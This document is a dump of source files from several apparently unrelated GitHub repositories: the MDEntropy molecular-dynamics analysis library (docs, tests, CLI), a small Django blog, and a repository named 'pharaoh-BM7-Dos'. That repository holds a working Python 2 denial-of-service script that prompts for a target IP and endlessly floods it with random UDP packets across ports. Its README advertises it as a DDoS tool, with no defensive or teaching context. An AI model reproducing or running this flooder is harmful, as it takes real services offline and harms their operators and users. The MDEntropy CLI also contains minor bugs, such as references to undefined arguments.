developed by researchers at Stanford University, with primary\napplication areas in computational protein dynamics and drug design, and distributed\nunder the `MIT License <https://tldrlegal.com/l/mit>`_.\nAll development takes place on `GitHub <https://github.com/msmbuilder/mdentropy>`_.\n\nTo cite MDEntropy, please use the following reference:\n\n.. code:: bibtex\n\n @article{mdentropy,\n author = {Carlos X. Hern{\\'{a}}ndez and Vijay S. Pande},\n title = {{MDEntropy: Information-Theoretic Analyses for Molecular Dynamics}},\n month = nov,\n year = 2017,\n doi = {10.21105/joss.00427},\n url = {https://doi.org/10.21105/joss.00427}\n }\n\n.. raw:: html\n\n <div style=\"display:none\">\n\n.. toctree::\n :maxdepth: 2\n\n installation\n examples/index\n api\n contributing\n publications\n changelog\n\n.. raw:: html\n\n </div>\n\n.. Indices and tables\n.. ==================\n..\n.. * :ref:`genindex`\n.. * :ref:`modindex`\n.. * :ref:`search`\n" }, { "alpha_fraction": 0.5833333134651184, "alphanum_fraction": 0.5833333134651184, "avg_line_length": 17, "blob_id": "1f8123581cdd09011150d97768fe572b52ca919e", "content_id": "00f2124cc84b1657f24d9ebb5ec9241c4cdbe412", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 72, "license_type": "permissive", "max_line_length": 32, "num_lines": 4, "path": "/docs/examples/mutual-information.rst", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "Mutual Information\n==================\n\n.. notebook:: mutual-information\n" }, { "alpha_fraction": 0.6840981841087341, "alphanum_fraction": 0.6840981841087341, "avg_line_length": 17.739999771118164, "blob_id": "be5f12adf1ab6041d84a99897a3d14b0cb25b3c7", "content_id": "e48c81ed338ba82768cea9a0b8212f524f23ecf5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 937, "license_type": "permissive", "max_line_length": 49, "num_lines": 50, "path": "/docs/api.rst", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": ".. _api_ref:\n\n.. currentmodule:: mdentropy\n\n\nAPI reference\n=============\n\nBinning Functions\n-----------------\n\n.. autosummary::\n :toctree: generated/\n\n mdentropy.core.binning.doanes_rule\n mdentropy.core.binning.hist\n mdentropy.core.binning.symbolic\n\nEntropy Calculations\n--------------------\n\n.. autosummary::\n :toctree: generated/\n\n mdentropy.entropy\n mdentropy.centropy\n\nInformation Calculations\n------------------------\n\n.. autosummary::\n :toctree: generated/\n\n mdentropy.mutinf\n mdentropy.nmutinf\n mdentropy.cmutinf\n mdentropy.ncmutinf\n\nFeature Metrics\n---------------\n\n.. autosummary::\n :toctree: generated/\n\n mdentropy.metrics.AlphaAngleMutualInformation\n mdentropy.metrics.AlphaAngleTransferEntropy\n mdentropy.metrics.ContactMutualInformation\n mdentropy.metrics.ContactTransferEntropy\n mdentropy.metrics.DihedralMutualInformation\n mdentropy.metrics.DihedralTransferEntropy\n" }, { "alpha_fraction": 0.5780290961265564, "alphanum_fraction": 0.6213247179985046, "avg_line_length": 26.625, "blob_id": "40f9903b5be7a6285403cd240e0dd553991b8473", "content_id": "34d080a90fbd4f28c657192c6523ddafbdc2009a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3095, "license_type": "permissive", "max_line_length": 79, "num_lines": 112, "path": "/mdentropy/tests/test_cmutinf.py", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "\nfrom ..utils import entropy_gaussian\nfrom ..core import cmutinf, centropy, ncmutinf\nfrom ..metrics import (AlphaAngleTransferEntropy, ContactTransferEntropy,\n DihedralTransferEntropy)\n\nfrom msmbuilder.example_datasets import FsPeptide\n\nimport numpy as np\nfrom numpy.testing import assert_almost_equal as eq, assert_allclose as close\n\nrs = np.random.RandomState(42)\nn, d = 50000, 3\n\nP = np.array([[1, .5, .25], [.5, 1, 0], [.25, 0, 1]])\nCOV = np.dot(P, P.T)\nY = rs.randn(d, n)\na, b, c = np.dot(P, Y)\na, b, c = np.atleast_2d(a).T, np.atleast_2d(b).T, np.atleast_2d(c).T\n\ntrue_cmutinf = (entropy_gaussian(COV[[[0, 0], [0, 2]], [[0, 2], [2, 2]]]) +\n entropy_gaussian(COV[[[1, 1], [1, 2]], [[1, 2], [2, 2]]]) -\n entropy_gaussian(COV) - entropy_gaussian(COV[2, 2]))\ntrue_cond_ent = (entropy_gaussian(COV[[[0, 0], [0, 2]], [[0, 2], [2, 2]]]) -\n entropy_gaussian(COV[2, 2]))\n\nTRUE_NCMUTINF = true_cmutinf / true_cond_ent\n\n\ndef test_ncmutinf_kde():\n close(ncmutinf(3, a, b, c, method='kde'), TRUE_NCMUTINF, atol=.05, rtol=.2)\n\n\ndef test_ncmutinf_knn():\n close(ncmutinf(3, a, b, c, method='knn'), TRUE_NCMUTINF, atol=.05, rtol=.2)\n\n\ndef test_ncmutinf_chaowangjost():\n close(ncmutinf(8, a, b, c, method='chaowangjost'), TRUE_NCMUTINF, atol=.05,\n rtol=.2)\n\n\ndef test_ncmutinf_grassberger():\n close(ncmutinf(8, a, b, c, method='grassberger'), TRUE_NCMUTINF, atol=.05,\n rtol=.2)\n\n\ndef test_ncmutinf_doanes_rule():\n close(ncmutinf(None, a, b, c, method='grassberger'), TRUE_NCMUTINF,\n atol=.05, rtol=.4)\n\n\ndef test_ncmutinf_naive():\n close(ncmutinf(8, a, b, c, method=None), TRUE_NCMUTINF, atol=.05, rtol=.2)\n\n\ndef test_ncmutinf():\n a = rs.uniform(low=0, high=360, size=1000).reshape(-1, 1)\n b = rs.uniform(low=0, high=360, size=1000).reshape(-1, 1)\n c = rs.uniform(low=0, high=360, size=1000).reshape(-1, 1)\n\n NCMI_REF = (cmutinf(10, a, b, c) /\n centropy(10, a, c))\n NCMI = ncmutinf(10, a, b, c)\n\n eq(NCMI, NCMI_REF, 5)\n\n\ndef test_fs_tent():\n\n traj1, traj2 = FsPeptide().get().trajectories[:2]\n\n idx = [at.index for at in traj1.topology.atoms\n if at.residue.index in [3, 4, 5, 6, 7, 8]]\n\n traj1 = traj1.atom_slice(atom_indices=idx)[::100]\n traj2 = traj2.atom_slice(atom_indices=idx)[::100]\n\n traj = (traj1, traj2)\n\n yield _test_tent_alpha, traj\n yield _test_tent_contact, traj\n yield _test_tent_dihedral, traj\n\n\ndef _test_tent_alpha(traj):\n tent = AlphaAngleTransferEntropy()\n T = tent.partial_transform(traj)\n\n assert T is not None\n\n\ndef _test_tent_contact(traj):\n tent = ContactTransferEntropy()\n T = tent.partial_transform(traj)\n\n assert T is not None\n\n\ndef _test_tent_dihedral(traj):\n tent = DihedralTransferEntropy()\n T = tent.partial_transform(traj)\n\n assert T is not None\n _test_tent_shuffle(tent, traj)\n\n\ndef _test_tent_shuffle(tent, traj):\n T = tent.partial_transform(traj, shuffle=0)\n TS = tent.partial_transform(traj, shuffle=1)\n\n assert T is not None\n assert TS is not None\n" }, { "alpha_fraction": 0.5446873903274536, "alphanum_fraction": 0.5492903590202332, "avg_line_length": 40.380950927734375, "blob_id": "cffb63ca5ea3192c3e9ac76eb95192cd6540c44e", "content_id": "27533dbe16621f6bd46fb30b0514a1a0cadd00a3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2607, "license_type": "permissive", "max_line_length": 78, "num_lines": 63, "path": "/mdentropy/cli/dtent.py", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "# !/usr/bin/env python\n\nfrom argparse import ArgumentDefaultsHelpFormatter\n\n\ndef func(args, parser):\n # delay import of the rest of the module to improve `mdentropy -h`\n # performance\n import pickle\n import mdtraj as md\n import pandas as pd\n from ..utils import parse_files\n from ..metrics import DihedralTransferEntropy\n\n f1, f2 = parse_files(args.current), parse_files(args.past)\n\n current = md.load(f1, top=args.top, stride=args.stride)\n past = md.load(f2, top=args.top, stride=args.stride)\n\n tent = DihedralTransferEntropy(n_bins=args.nbins, types=args.types,\n method=args.method, threads=args.n_threads,\n normed=True)\n\n T = tent.partial_transform((past, current), shuffle=iter, verbose=True)\n\n df = pd.DataFrame(T, columns=tent.labels)\n\n pickle.dump(df, open(args.out, 'wb'))\n\n\ndef configure_parser(sub_parsers):\n help = 'Run a dihedral transfer entropy calculation'\n p = sub_parsers.add_parser('dtent', description=help, help=help,\n formatter_class=ArgumentDefaultsHelpFormatter)\n p.add_argument('-p', '--past', dest='past',\n help='File containing past step states.',\n required=True)\n p.add_argument('-s', '--shuffle-iter', dest='iter',\n help='Number of shuffle iterations.',\n default=10, type=int)\n p.add_argument('-r', '--stride', dest='stride',\n help='Stride to use', default=1, type=int)\n p.add_argument('-t', '--topology',\n dest='top', help='File containing topology.',\n default=None)\n p.add_argument('-b', '--n-bins', dest='nbins',\n help='Number of bins', default=3, type=int)\n p.add_argument('-n', '--n-threads', dest='N',\n help='Number of threads', default=None, type=int)\n p.add_argument('-o', '--output', dest='out',\n help='Name of output file.', default='tent.pkl')\n p.add_argument('-m', '--method', dest='method',\n help='Entropy estimate method.',\n choices=['chaowangjost', 'grassberger', 'kde',\n 'knn', 'naive'],\n default='knn')\n p.add_argument('-d', '--dihedrals', dest='dihedrals',\n help='Dihedral angles to analyze.',\n nargs='+',\n choices=['phi', 'psi', 'omega', 'chi1',\n 'chi2', 'chi3', 'chi4'],\n default=['phi', 'psi'])\n p.set_defaults(func=func)\n" }, { "alpha_fraction": 0.6166666746139526, "alphanum_fraction": 0.6489583253860474, "avg_line_length": 23.615385055541992, "blob_id": "3762a67ae01eb83e3207ece2585cbf70eaaf6aa8", "content_id": "ed16b9fc46ac0404f01639ba26c48e4d4a369103", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 960, "license_type": "permissive", "max_line_length": 79, "num_lines": 39, "path": "/mdentropy/tests/test_entropy.py", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "from ..utils import entropy_gaussian\nfrom ..core import entropy\n\nimport numpy as np\nfrom numpy.testing import assert_allclose as close\n\nrs = np.random.RandomState(42)\nn, d = 50000, 3\nP = np.array([[1, 0, 0], [0, 1, .5], [0, 0, 1]])\nCOV = np.dot(P, P.T)\nY = rs.randn(d, n)\nX = np.dot(P, Y).T\n\nTRUE_ENTROPY = entropy_gaussian(COV)\nRNG = list(zip(*(X.min(axis=0), X.max(axis=0))))\n\n\ndef test_entropy_kde():\n close(entropy(8, RNG, 'kde', X), TRUE_ENTROPY, rtol=.2)\n\n\ndef test_entropy_knn():\n close(entropy(3, [None], 'knn', X), TRUE_ENTROPY, rtol=.2)\n\n\ndef test_entropy_chaowangjost():\n close(entropy(8, RNG, 'chaowangjost', X), TRUE_ENTROPY, rtol=.2)\n\n\ndef test_entropy_grassberger():\n close(entropy(8, RNG, 'grassberger', X), TRUE_ENTROPY, rtol=.2)\n\n\ndef test_entropy_doanes_rule():\n close(entropy(None, RNG, 'grassberger', X), TRUE_ENTROPY, atol=2., rtol=.2)\n\n\ndef test_entropy_naive():\n close(entropy(8, RNG, None, X), TRUE_ENTROPY, rtol=.2)\n" }, { "alpha_fraction": 0.7599999904632568, "alphanum_fraction": 0.7599999904632568, "avg_line_length": 24, "blob_id": "484b6f685b45721f3f11e7ccc4961aa5ee12b0ca", "content_id": "4a6460b51b38a154882d351d6a61d86d961cdc02", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 50, "license_type": "permissive", "max_line_length": 26, "num_lines": 2, "path": "/mdentropy/core/__init__.py", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "from .entropy import *\nfrom .information import *\n" }, { "alpha_fraction": 0.6022409200668335, "alphanum_fraction": 0.6054421663284302, "avg_line_length": 30.237499237060547, "blob_id": "9c81d6b6507f4a2337aab693224dda01e506acad", "content_id": "d2ebb63f06756495ed65aea9e0a6f41573bf7e20", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2499, "license_type": "permissive", "max_line_length": 79, "num_lines": 80, "path": "/mdentropy/metrics/tent.py", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "from ..core import cmutinf, ncmutinf\nfrom .base import (AlphaAngleBaseMetric, ContactBaseMetric, DihedralBaseMetric,\n BaseMetric)\n\n\nimport numpy as np\nfrom itertools import product\n\nfrom multiprocessing import Pool\nfrom contextlib import closing\n\n__all__ = ['AlphaAngleTransferEntropy', 'ContactTransferEntropy',\n 'DihedralTransferEntropy']\n\n\nclass TransferEntropyBase(BaseMetric):\n\n \"\"\"Base transfer entropy object\"\"\"\n\n def _partial_tent(self, p):\n i, j = p\n\n return self._est(self.n_bins,\n self.data[j].values,\n self.shuffled_data[i].values,\n self.shuffled_data[j].values,\n rng=self.rng,\n method=self.method)\n\n def _exec(self):\n with closing(Pool(processes=self.n_threads)) as pool:\n CMI = list(pool.map(self._partial_tent,\n product(self.labels, self.labels)))\n pool.terminate()\n\n return np.reshape(CMI, (self.labels.size, self.labels.size)).T\n\n def _before_exec(self, traj):\n traj1, traj2 = traj\n self.data = self._extract_data(traj2)\n self.shuffled_data = self._extract_data(traj1)\n self.labels = np.unique(self.data.columns.levels[0])\n\n def __init__(self, normed=True, **kwargs):\n self._est = ncmutinf if normed else cmutinf\n self.partial_transform.__func__.__doc__ = \"\"\"\n Partial transform a mdtraj.Trajectory into an n_residue by n_residue\n matrix of transfer entropy scores.\n\n Parameters\n ----------\n traj : tuple\n Pair of trajectories to transform (state0, state1)\n shuffle : int\n Number of shuffle iterations (default: 0)\n verbose : bool\n Whether to display performance\n\n Returns\n -------\n result : np.ndarray, shape = (n_residue, n_residue)\n Transfer entropy matrix\n \"\"\"\n\n super(TransferEntropyBase, self).__init__(**kwargs)\n\n\nclass AlphaAngleTransferEntropy(AlphaAngleBaseMetric, TransferEntropyBase):\n\n \"\"\"Transfer entropy calculations for alpha angles\"\"\"\n\n\nclass ContactTransferEntropy(ContactBaseMetric, TransferEntropyBase):\n\n \"\"\"Transfer entropy calculations for contacts\"\"\"\n\n\nclass DihedralTransferEntropy(DihedralBaseMetric, TransferEntropyBase):\n\n \"\"\"Transfer entropy calculations for dihedral angles\"\"\"\n" }, { "alpha_fraction": 0.875, "alphanum_fraction": 0.875, "avg_line_length": 7, "blob_id": "357caf93dd08999dedd27e9a77074cd269bb2671", "content_id": "54ae6be1bcf7e5356e995404b9a2d152e4b2598d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 48, "license_type": "permissive", "max_line_length": 10, "num_lines": 6, "path": "/requirements.txt", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "numpy\nscipy\npandas\nmsmbuilder\nmdtraj\nmsmbuilder\n" }, { "alpha_fraction": 0.686656653881073, "alphanum_fraction": 0.7241379022598267, "avg_line_length": 36.05555725097656, "blob_id": "d680f5ae90bbddee2b4391b4b42f50adc19c88bd", "content_id": "92662a192dcf055ca528a7565235e97ba3870e07", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2001, "license_type": "permissive", "max_line_length": 155, "num_lines": 54, "path": "/README.md", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "[![Build Status](https://travis-ci.org/msmbuilder/mdentropy.svg?branch=master)](https://travis-ci.org/msmbuilder/mdentropy)\n[![Code Health](https://landscape.io/github/msmbuilder/mdentropy/master/landscape.svg?style=flat)](https://landscape.io/github/msmbuilder/mdentropy/master)\n[![PyPI version](https://badge.fury.io/py/mdentropy.svg)](http://badge.fury.io/py/mdentropy)\n[![License](https://img.shields.io/badge/license-MIT-red.svg?style=flat)](https://opensource.org/licenses/MIT)\n[![Documentation](https://img.shields.io/badge/docs-latest-blue.svg?style=flat)](http://msmbuilder.org/mdentropy/)\n[![DOI](http://joss.theoj.org/papers/10.21105/joss.00427/status.svg)](https://doi.org/10.21105/joss.00427)\n\n\nMDEntropy\n=========\n\nMDEntropy is a python library that allows users to perform information-theoretic\nanalyses on molecular dynamics (MD) trajectories. It includes methods to\ncalculate:\n\n+ Bias-Corrected Entropy\n+ Conditional Entropy\n+ Mutual Information\n+ Normalized Mutual Information\n+ Conditional Mutual Information\n+ Normalized Conditional Mutual Information\n\n\n## Documentation\n\nFull documentation can be found at [http://msmbuilder.org/mdentropy/](http://msmbuilder.org/mdentropy/).\nFor information about installation, please refer to our [Installation](http://msmbuilder.org/mdentropy/0.3.0/installation.html) page.\n\nWe also have [example notebooks](http://msmbuilder.org/mdentropy/0.3.0/examples/index.html) with common use cases for MDEntropy.\nPlease feel free to add your own as a pull-request!\n\n## Requirements\n\n+ `python`>=3.4\n+ `numpy`>=1.10.4\n+ `scipy`>=0.17.0\n+ `scikit-learn`>=0.17.0\n+ `msmbuilder`>=3.5.0\n+ `nose` (optional, for testing)\n\n## Citing\n\nPlease cite:\n\n```bibtex\n@article{mdentropy,\n author = {Carlos X. Hern{\\'{a}}ndez and Vijay S. Pande},\n title = {{MDEntropy: Information-Theoretic Analyses for Molecular Dynamics}},\n month = nov,\n year = 2017,\n doi = {10.21105/joss.00427},\n url = {https://doi.org/10.21105/joss.00427}\n}\n```\n" }, { "alpha_fraction": 0.5625303983688354, "alphanum_fraction": 0.5751824975013733, "avg_line_length": 23.464284896850586, "blob_id": "7409a93e30369989c4ce790161d368801bfb9ef3", "content_id": "34345a54d5bfdc2dc09994ef452f4bc84e3756fe", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2055, "license_type": "permissive", "max_line_length": 86, "num_lines": 84, "path": "/mdentropy/core/binning.py", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "from ..utils import unique_row_count\n\nfrom numpy import (array, atleast_1d, digitize, empty, floor, linspace, log2,\n histogramdd, hstack, ndarray, sqrt, vstack)\nfrom scipy.stats import skew\n\n__all__ = ['hist', 'symbolic', 'doanes_rule']\n\n\ndef doanes_rule(x):\n \"\"\"Convenience function for choosing an optimal number of bins using Doane's Rule.\n\n Parameters\n ----------\n x : numpy.ndarray or list of floats\n Data to be binned.\n\n Returns\n -------\n n_bins : int\n \"\"\"\n if not isinstance(x, ndarray):\n x = array(x)\n\n n = x.shape[0]\n g1 = atleast_1d(skew(x))\n sg1 = sqrt(6 * (n - 2) / ((n + 1) * (n + 3)))\n\n return min(floor(1 + log2(n) + log2(1 + abs(g1)/sg1)))\n\n\ndef hist(n_bins, rng, *args):\n \"\"\"Convenience function for histogramming N-dimentional data\n\n Parameters\n ----------\n n_bins : int\n Number of bins.\n rng : list of lists\n List of min/max values to bin data over.\n args : array_like, shape = (n_samples, )\n Data of which to histogram.\n\n Returns\n -------\n bins : array_like, shape = (n_bins, )\n \"\"\"\n data = vstack((args)).T\n\n if n_bins is None:\n n_bins = doanes_rule(data)\n\n return histogramdd(data, bins=n_bins, range=rng)[0].flatten()\n\n\ndef symbolic(n_bins, rng, *args):\n \"\"\"Symbolic binning of data\n\n Parameters\n ----------\n rng : list of lists\n List of min/max values for each dimention.\n n_bins : int\n Number of bins to use.\n args : array_like, shape = (n_samples, )\n Data of which to calculate entropy. Each array must have the same\n number of samples.\n\n Returns\n -------\n counts : float\n \"\"\"\n labels = empty(0).reshape(args[0].shape[0], 0)\n if n_bins is None:\n n_bins = min(map(doanes_rule, args))\n\n for i, arg in enumerate(args):\n\n partitions = linspace(rng[i][0], rng[i][1], n_bins + 1)\n label = digitize(arg, partitions).reshape(-1, 1)\n\n labels = hstack((labels, label))\n\n return unique_row_count(labels)\n" }, { "alpha_fraction": 0.5489022135734558, "alphanum_fraction": 0.552495002746582, "avg_line_length": 41.45762634277344, "blob_id": "1b5d5735b08f7cbc0cff8fb1c2828886237fec11", "content_id": "6ed2881561ff14a6583037dd147b0b55eac2d4c6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2505, "license_type": "permissive", "max_line_length": 82, "num_lines": 59, "path": "/mdentropy/cli/dmutinf.py", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "# !/usr/bin/env python\n\nfrom argparse import ArgumentDefaultsHelpFormatter\n\n\ndef func(args, parser):\n # delay import of the rest of the module to improve `mdentropy -h` performance\n import pickle\n import mdtraj as md\n import pandas as pd\n from ..utils import parse_files\n from ..metrics import DihedralMutualInformation\n\n files = parse_files(args.traj)\n traj = md.load(files, top=args.top, stride=args.stride)\n\n mi = DihedralMutualInformation(n_bins=args.nbins, types=args.types,\n method=args.method, threads=args.n_threads,\n normed=True)\n\n M = mi.partial_transform(traj, shuffle=iter, verbose=True)\n\n df = pd.DataFrame(M, columns=mi.labels)\n\n pickle.dump(df, open(args.out, 'wb'))\n\n\ndef configure_parser(sub_parsers):\n help = 'Run a dihedral mutual information calculation'\n p = sub_parsers.add_parser('dmutinf', description=help, help=help,\n formatter_class=ArgumentDefaultsHelpFormatter)\n p.add_argument('-i', '--input', dest='traj',\n help='File containing trajectory.', required=True)\n p.add_argument('-s', '--shuffle-iter', dest='iter',\n help='Number of shuffle iterations.',\n default=100, type=int)\n p.add_argument('-t', '--topology', dest='top',\n help='File containing topology.', default=None)\n p.add_argument('-b', '--n-bins', dest='nbins',\n help='Number of bins', default=3, type=int)\n p.add_argument('-n', '--n-threads', dest='n_threads',\n help='Number of threads to be used.',\n default=None, type=int)\n p.add_argument('-r', '--stride', dest='stride',\n help='Stride to use', default=1, type=int)\n p.add_argument('-o', '--output', dest='out',\n help='Name of output file.', default='mutinf.pkl')\n p.add_argument('-m', '--method', dest='method',\n help='Entropy estimate method.',\n choices=['chaowangjost', 'grassberger', 'kde',\n 'knn', 'naive'],\n default='knn')\n p.add_argument('-d', '--dihedrals', dest='dihedrals',\n help='Dihedral angles to analyze.',\n nargs='+',\n choices=['phi', 'psi', 'omega', 'chi1',\n 'chi2', 'chi3', 'chi4'],\n default=['phi', 'psi'])\n p.set_defaults(func=func)\n" } ]
26
pharaoh1bm7/pharaoh-BM7-Dos
https://github.com/pharaoh1bm7/pharaoh-BM7-Dos
9c0abd9e21849689d0939c1f75166b66596394af
5e388197e2bc2b426b63b6551543249a6f2c813b
2c85ef99020116d7c18cf141adf7d0438c145274
refs/heads/main
2023-05-07T04:21:28.464238
2021-05-26T19:25:44
2021-05-26T19:25:44
371,064,182
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5893271565437317, "alphanum_fraction": 0.6380510330200195, "avg_line_length": 20.524999618530273, "blob_id": "01117c801d914f5907769ec9f322746389ebfc51", "content_id": "0202c48f79e2b8b6e664314b95131afca6b27725", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 862, "license_type": "no_license", "max_line_length": 63, "num_lines": 40, "path": "/pharaoh BM7 Dos.py", "repo_name": "pharaoh1bm7/pharaoh-BM7-Dos", "src_encoding": "UTF-8", "text": "import sys\nimport os\nimport time\nimport socket\nimport random\n#Code Time\nfrom datetime import datetime\nnow = datetime.now()\nhour = now.hour\nminute = now.minute\nday = now.day\nmonth = now.month\nyear = now.year\n\n##############\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nbytes = random._urandom(1490)\n#############\n\nos.system(\"clear\")\nos.system(\"figlet pharaoh BM7 Dos\")\nprint \"\"\nprint \"\t\tby pharaoh BM7 & S0DIUM TA8\"\nprint \"\t\ttelegram : +1 510 216 7579\"\nprint \"\t\tgithub : pharaoh1bm7\"\nprint \"\t\twhatsapp : +994 40 778 12 25\"\nprint\nip = raw_input(\"\tIP Target : \")\nport = input(\"\t\tPort : \")\n\nos.system(\"clear\")\nos.system(\"figlet Attack Starting\")\nsent = 0\nwhile True:\n sock.sendto(bytes, (ip,port))\n sent = sent + 1\n port = port + 1\n print \"Sent %s packet to %s DOS to port:%s\"%(sent,ip,port)\n if port == 65534:\n port = 1\n\n" }, { "alpha_fraction": 0.7551867365837097, "alphanum_fraction": 0.7634854912757874, "avg_line_length": 31, "blob_id": "d9fb75e00d2b3daf7ba784825858c9d869fa6420", "content_id": "c95a5512db7f2399bdf60173bc4155effda2a267", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 482, "license_type": "no_license", "max_line_length": 125, "num_lines": 15, "path": "/README.md", "repo_name": "pharaoh1bm7/pharaoh-BM7-Dos", "src_encoding": "UTF-8", "text": "# pharaoh-BM7-Dos\n\n\n\n# DDos-Attack \n### What Is A DDos-Attack\n### A Distributed Denial of Service (DDoS) attack is an attempt to make an online service unavailable \nby overwhelming it with traffic from multiple sources. They target a wide variety of important resources\nfrom banks to news websites, and present a major challenge to making sure people can publish and access important information\n\n### cd pharaoh BM7 Dos\n\n### chmod +x pharaoh BM7 Dos\n\n###python pharaoh BM7 Dos.py\n\n\n" } ]
2
cuongtranba/django-python-blog
https://github.com/cuongtranba/django-python-blog
7d481ed2621422cfdae2cfcbc9c74300a2fd74cd
33d2e8404e411e26ca8407ae1299fdfdc128eddc
dc7b885f24ea3a10f0f00d8e0f46cb0d8691ac34
refs/heads/master
2021-01-17T18:07:13.450092
2016-11-05T07:54:30
2016-11-05T07:54:30
71,055,321
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5644444227218628, "alphanum_fraction": 0.5940740704536438, "avg_line_length": 24.961538314819336, "blob_id": "a0a5ae22dca9f07eec680ad226fd493ecc06c45a", "content_id": "677e47be1950902a4163d1af484667ede85f34ed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 675, "license_type": "no_license", "max_line_length": 103, "num_lines": 26, "path": "/myblog/migrations/0005_auto_20161102_0917.py", "repo_name": "cuongtranba/django-python-blog", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.7 on 2016-11-02 02:17\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('myblog', '0004_post_category'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='category',\n old_name='name',\n new_name='category_name',\n ),\n migrations.AlterField(\n model_name='post',\n name='category',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='myblog.Category'),\n ),\n ]\n" }, { "alpha_fraction": 0.695602536201477, "alphanum_fraction": 0.6978869438171387, "avg_line_length": 32.55769348144531, "blob_id": "aa9b2f886a8b744fb36dfa6f733cce253fe60dce", "content_id": "513a4f2f4885411ad0e2a5b7c83e1a3d7a43d788", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1751, "license_type": "no_license", "max_line_length": 97, "num_lines": 52, "path": "/myblog/views.py", "repo_name": "cuongtranba/django-python-blog", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.template import loader\nfrom .models import Category,Tag,Post\nfrom django.contrib.auth import authenticate, login,logout\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponseRedirect\nfrom django.contrib.auth.models import User\nimport datetime\n\ndef index(request):\n categories = Category.objects.all()\n posts= Post.objects.all()\n tags=Tag.objects.all()\n return render(request, \"index.html\", {'categories': categories,'tags':tags,'posts':posts})\n\ndef UserLogin(request):\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n url=reverse(\"index\")\n return HttpResponseRedirect(url)\n else:\n return HttpResponse('<h1>Error</h1>') \n \ndef UserLogout(request):\n logout(request)\n url=reverse(\"index\")\n return HttpResponseRedirect(url)\n\ndef UserRegister(request):\n username=request.POST['username']\n password=request.POST['password']\n email=request.POST['email']\n user = User.objects.create_user(username, email, password)\n if user is not None:\n url=reverse(\"index\")\n return HttpResponseRedirect(url)\n return HttpResponse('<h1>Error</h1>')\n\ndef CreatePost(request):\n if request.method == 'GET':\n return render(request,\"post.html\") \n else:\n title=request.POST['title']\n content=request.POST['content']\n post=Post(title=title,content=content,user=request.user,pub_date=datetime.datetime.now())\n post.save()\n url=reverse(\"index\")\n return HttpResponseRedirect(url)\n \n\n" }, { "alpha_fraction": 0.7727272510528564, "alphanum_fraction": 0.7727272510528564, "avg_line_length": 21, "blob_id": "504c14f4b5a1ecab268561e05de70b200d7811db", "content_id": "73fb3359ff78da5c7d794aa43999c493a6a53fee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 44, "license_type": "no_license", "max_line_length": 22, "num_lines": 2, "path": "/README.md", "repo_name": "cuongtranba/django-python-blog", "src_encoding": "UTF-8", "text": "# django-python-blog\nMy blog made by django\n" }, { "alpha_fraction": 0.7022472023963928, "alphanum_fraction": 0.7134831547737122, "avg_line_length": 21.967741012573242, "blob_id": "75fae6d4c966ca780ab13829a017631aaa184925", "content_id": "d83e60b70a2007a61105f139183e3ea3388b9502", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 712, "license_type": "no_license", "max_line_length": 52, "num_lines": 31, "path": "/myblog/models.py", "repo_name": "cuongtranba/django-python-blog", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.contrib.auth.models import User\n\n# Create your models here.\n\n\nclass BaseModel(models.Model):\n is_deleted = models.BooleanField(default=False)\n id = models.AutoField(primary_key=True)\n\n class Meta:\n abstract = True\n\nclass Tag(BaseModel):\n tag_name = models.CharField(max_length=20)\n\n\nclass Category(BaseModel):\n category_name = models.CharField(max_length=200)\n\n\nclass Post(BaseModel):\n title = models.CharField(max_length=200)\n content = models.TextField()\n \n pub_date = models.DateTimeField()\n user = models.ForeignKey(User,null=True)\n\n tag = models.ForeignKey(Tag,null=True)\n\n category = models.ForeignKey(Category,null=True)\n" }, { 